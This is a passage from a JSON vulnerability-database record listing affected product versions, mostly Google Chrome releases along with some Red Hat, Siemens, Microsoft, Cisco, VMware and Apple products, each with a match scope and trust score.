        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.864.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.208"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.959.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.27"
      },
      {
        "model": "servers sw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x862.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.624.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.156"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.639.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1293.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.698.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1079.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.338"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.598.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.30"
      },
      {
        "model": "simatic ipc377e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.894.0"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.737.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1061"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.237"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.214"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1444.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1672.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.52"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.320"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.28"
      },
      {
        "model": "tvos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.311"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.693.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.736.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1069.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.606.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.438.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.209"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.113"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201610"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1299.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.226"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.869.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.738.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.231"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.13"
      },
      {
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.578.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.380.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.809.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.361.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1018"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.701.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.780.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.605.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1051.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.49"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.663.0"
      },
      {
        "model": "pyxis ciisafe -workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.537.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1275.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.133"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1046.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1062"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.934.0"
      },
      {
        "model": "simatic hmi basic panels 2nd generation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1020"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.469.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1080.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.67"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.951.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.130"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.414.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.52"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.332"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.108"
      },
      {
        "model": "simatic field pg m4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
